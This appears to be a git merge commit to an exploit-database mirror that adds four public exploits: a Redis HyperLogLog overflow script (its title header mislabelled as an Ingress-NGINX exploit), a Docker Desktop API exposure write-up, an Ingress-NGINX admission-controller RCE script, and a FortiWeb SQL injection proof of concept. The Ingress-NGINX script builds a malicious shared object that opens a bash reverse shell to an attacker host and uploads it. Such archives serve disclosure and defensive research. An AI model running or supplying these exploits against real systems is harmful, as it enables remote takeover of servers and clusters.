Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/linux/remote/52477.py

@@ -0,0 +1,79 @@
+# Exploit Title:  Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE
+# Date: 2025-10-07
+# Exploit Author: Beatriz Fresno Naumova
+# Vendor Homepage: https://redis.io/
+# Software Link: https://redis.io/
+# Version: Affects :>= 8.0.0, < 8.0.3
+# Tested on: Ubuntu 22.04
+# CVE: CVE-2025-32023
+
+import redis
+import sys
+
+# --- Configuration ---
+REDIS_HOST = 'localhost'
+REDIS_PORT = 6379
+REDIS_KEY = 'hll:exp'
+
+# HLL encoding type (1 = sparse)
+HLL_SPARSE = 1
+
+
+def p8(value):
+    """Convert integer to single byte."""
+    return bytes([value])
+
+
+def xzero(size):
+    """
+    Construct an 'xzero' run for sparse HLL:
+    Creates a run-length encoding entry of zeroes with a specific size.
+    """
+    if not (1 <= size <= 0x4000):
+        raise ValueError("Invalid xzero size: must be between 1 and 0x4000")
+    size -= 1
+    return p8(0b01_000000 | (size >> 8)) + p8(size & 0xff)
+
+
+def build_malformed_hll():
+    """
+    Construct a malformed HLL payload that overflows internal counters.
+    """
+    payload = b'HYLL'                # Magic header
+    payload += p8(HLL_SPARSE)        # Encoding type: sparse
+    payload += p8(0) * 3             # Reserved
+    payload += p8(0) * 8             # Unused (padding)
+
+    assert len(payload) == 0x10      # Check header size
+
+    # Append enough xzero runs to cause overflow
+    payload += xzero(0x4000) * 0x20000  # == -0x80000000 when cast to signed int
+
+    # Add one more run to complete the structure
+    payload += p8(0b11111111)  # Runlen=4, regval=0x20 (but malformed)
+
+    return payload
+
+
+def main():
+    try:
+        print(f"[*] Connecting to Redis at {REDIS_HOST}:{REDIS_PORT}...")
+        r = redis.Redis(REDIS_HOST, REDIS_PORT)
+
+        print("[*] Building malformed HyperLogLog payload...")
+        hll_payload = build_malformed_hll()
+
+        print(f"[*] Writing malformed HLL to key: {REDIS_KEY}")
+        r.set(REDIS_KEY, hll_payload)
+
+        print("[*] Triggering HLL merge operation (pfcount)...")
+        r.pfcount(REDIS_KEY, REDIS_KEY)
+
+        print("[+] Exploit triggered successfully.")
+    except Exception as e:
+        print(f"[!] Exploit failed: {e}")
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()

exploits/multiple/local/52472.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Docker Desktop 4.44.3 - Unauthenticated  API Exposure
+# Date: 2025-10-06
+# Exploit Author: OilSeller2001
+# Vendor Homepage: https://www.docker.com/
+# Software Link: https://www.docker.com/products/docker-desktop/
+# Version: Affected on Windows and macOS versions prior to 4.44.3
+# Tested on: Windows 11 + Docker Desktop 4.43.0
+# Exploit Type: Remote, Local, Shellcode
+# Platform: Windows
+# CVE: CVE-2025-9074
+
+# Description:
+This PoC script exploits a security misconfiguration in the unauthenticated exposure of the Docker Engine API.
+By sending crafted API requests directly to the Docker daemon, the script creates and starts a specially prepared container.
+The container leverages the bind mount feature to map sensitive directories from the host filesystem into the container, effectively granting arbitrary access to the host.
+This results in a high-privilege remote code execution scenario.
+
+# Vulnerability Details:
+The Docker Engine API (TCP port 2375) can be exposed without TLS authentication via the "Expose daemon on tcp://localhost:2375 without TLS" option in Docker Desktop.
+If this option is enabled, any local or remote attacker with network access to the exposed port can control the Docker daemon without authentication.
+
+# Usage:
+1. Expose the Docker daemon on TCP 2375 without TLS (testing environment only).
+2. Run the PoC against the target:
+   python3 poc_cve_2025_9074.py <target_ip>:2375
+3. The script will:
+   - Check API availability
+   - Pull an image
+   - Create a malicious container with bind mounts to the host filesystem
+   - Start the container, allowing access to host files
+
+# Mitigation:
+- Disable the unauthenticated Docker API exposure after testing.
+- Use TLS certificates if remote API access is required.
+- Restrict network access to port 2375 via firewall rules.
+
+# PoC Download Link:
+https://github.com/OilSeller2001/PoC-for-CVE-2025-9074

exploits/multiple/remote/52475.txt

@@ -0,0 +1,159 @@
+# Exploit Title:  Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE
+# Date: 2025-10-07
+# Exploit Author: Beatriz Fresno Naumova
+# Vendor Homepage: https://kubernetes.io
+# Software Link: https://github.com/kubernetes/ingress-nginx
+# Version: Affects v1.10.0 to v1.11.1 (potentially others)
+# Tested on: Ubuntu 22.04, RKE2 Kubernetes Cluster
+# CVE: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974
+
+import os
+import sys
+import socket
+import requests
+import threading
+from urllib.parse import urlparse
+from concurrent.futures import ThreadPoolExecutor
+import urllib3
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# --- Embedded malicious shared object template ---
+MALICIOUS_C_TEMPLATE = """
+#include <stdlib.h>
+
+__attribute__((constructor))
+void run_on_load() {
+    system("bash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'");
+}
+
+int bind(void *e, const char *id) {
+    return 1;
+}
+
+void ENGINE_load_evil() {}
+
+int bind_engine() {
+    return 1;
+}
+"""
+
+def compile_shared_library(host, port, output_file="evil_engine.so"):
+    c_code = MALICIOUS_C_TEMPLATE.replace("HOST", host).replace("PORT", str(port))
+
+    with open("evil_engine.c", "w") as f:
+        f.write(c_code)
+
+    print("[*] Compiling malicious shared object...")
+    result = os.system("gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto")
+
+    if result == 0:
+        print("[+] Shared object compiled successfully.")
+        return True
+    else:
+        print("[!] Compilation failed. Is gcc installed?")
+        return False
+
+
+def send_brute_request(admission_url, json_template, proc, fd):
+    print(f"[*] Trying /proc/{proc}/fd/{fd}")
+    path = f"proc/{proc}/fd/{fd}"
+    payload = json_template.replace("REPLACE", path)
+
+    headers = {"Content-Type": "application/json"}
+    url = admission_url.rstrip("/") + "/admission"
+
+    try:
+        response = requests.post(url, data=payload, headers=headers, verify=False, timeout=5)
+        print(f"[+] Response for /proc/{proc}/fd/{fd}: {response.status_code}")
+    except Exception as e:
+        print(f"[!] Error on /proc/{proc}/fd/{fd}: {e}")
+
+
+def brute_force_admission(admission_url, json_file="review.json", max_proc=50, max_fd=30, max_workers=5):
+    try:
+        with open(json_file, "r") as f:
+            json_data = f.read()
+    except FileNotFoundError:
+        print(f"[!] Error: {json_file} not found.")
+        return
+
+    print("[*] Starting brute-force against the admission webhook...")
+    with ThreadPoolExecutor(max_workers=max_workers) as executor:
+        for proc in range(1, max_proc):
+            for fd in range(3, max_fd):
+                executor.submit(send_brute_request, admission_url, json_data, proc, fd)
+
+
+def upload_shared_library(ingress_url, shared_object="evil_engine.so"):
+    try:
+        with open(shared_object, "rb") as f:
+            evil_payload = f.read()
+    except FileNotFoundError:
+        print(f"[!] Error: {shared_object} not found.")
+        return
+
+    parsed = urlparse(ingress_url)
+    host = parsed.hostname
+    port = parsed.port or 80
+    path = parsed.path or "/"
+
+    try:
+        sock = socket.create_connection((host, port))
+    except Exception as e:
+        print(f"[!] Failed to connect to {host}:{port}: {e}")
+        return
+
+    fake_length = len(evil_payload) + 10
+    headers = (
+        f"POST {path} HTTP/1.1\r\n"
+        f"Host: {host}\r\n"
+        f"User-Agent: qmx-ingress-exploiter\r\n"
+        f"Content-Type: application/octet-stream\r\n"
+        f"Content-Length: {fake_length}\r\n"
+        f"Connection: keep-alive\r\n\r\n"
+    ).encode("iso-8859-1")
+
+    print("[*] Uploading malicious shared object to ingress...")
+    sock.sendall(headers + evil_payload)
+
+    response = b""
+    while True:
+        chunk = sock.recv(4096)
+        if not chunk:
+            break
+        response += chunk
+
+    print("[*] Server response:\n")
+    print(response.decode(errors="ignore"))
+    sock.close()
+
+
+def main():
+    if len(sys.argv) != 4:
+        print("Usage: python3 exploit.py <ingress_url> <admission_webhook_url> <rev_host:port>")
+        sys.exit(1)
+
+    ingress_url = sys.argv[1]
+    admission_url = sys.argv[2]
+    rev_host_port = sys.argv[3]
+
+    if ':' not in rev_host_port:
+        print("[!] Invalid format for rev_host:port.")
+        sys.exit(1)
+
+    host, port = rev_host_port.split(":")
+
+    if not compile_shared_library(host, port):
+        sys.exit(1)
+
+    # Send the malicious shared object and keep the connection open
+    upload_thread = threading.Thread(target=upload_shared_library, args=(ingress_url,))
+    upload_thread.start()
+
+    # Simultaneously brute-force the admission webhook for valid file descriptors
+    brute_force_admission(admission_url)
+
+
+if __name__ == "__main__":
+    main()

exploits/multiple/webapps/52473.txt

@@ -0,0 +1,49 @@
+# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL
+Injection to Remote Code Execution
+# Date: 2025-10-05
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# Tested on: Win, Ubuntu
+# CVE : CVE-2025-25257
+
+Overview
+
+CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in
+Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.
+This flaw allows attackers to inject malicious SQL commands into the
+vulnerable API endpoint, potentially leading to Remote Code Execution (RCE).
+
+
+PoC
+
+curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
+  https://<fortiweb-ip>/api/fabric/device/status
+
+PoC Python
+
+import requests
+
+def test_sqli(base_url):
+    url = f"{base_url}/api/fabric/device/status"
+    headers = {
+        "Authorization": "Bearer aaa' OR '1'='1"
+    }
+    try:
+        response = requests.get(url, headers=headers, verify=False,
+timeout=10)
+        print(f"Status code: {response.status_code}")
+        print("Response body:")
+        print(response.text)
+    except Exception as e:
+        print(f"Error: {e}")
+
+if __name__ == "__main__":
+    import argparse
+    parser = argparse.ArgumentParser(description="PoC SQLi By Ex3ptionaL
+CVE-2025-25257 FortiWeb")
+    parser.add_argument("base_url", help="Base URL of FortiWeb (ex:
+https://10.0.0.5)")
+    args = parser.parse_args()
+    test_sqli(args.base_url)
+# python3 src/poc.py https://10.0.0.5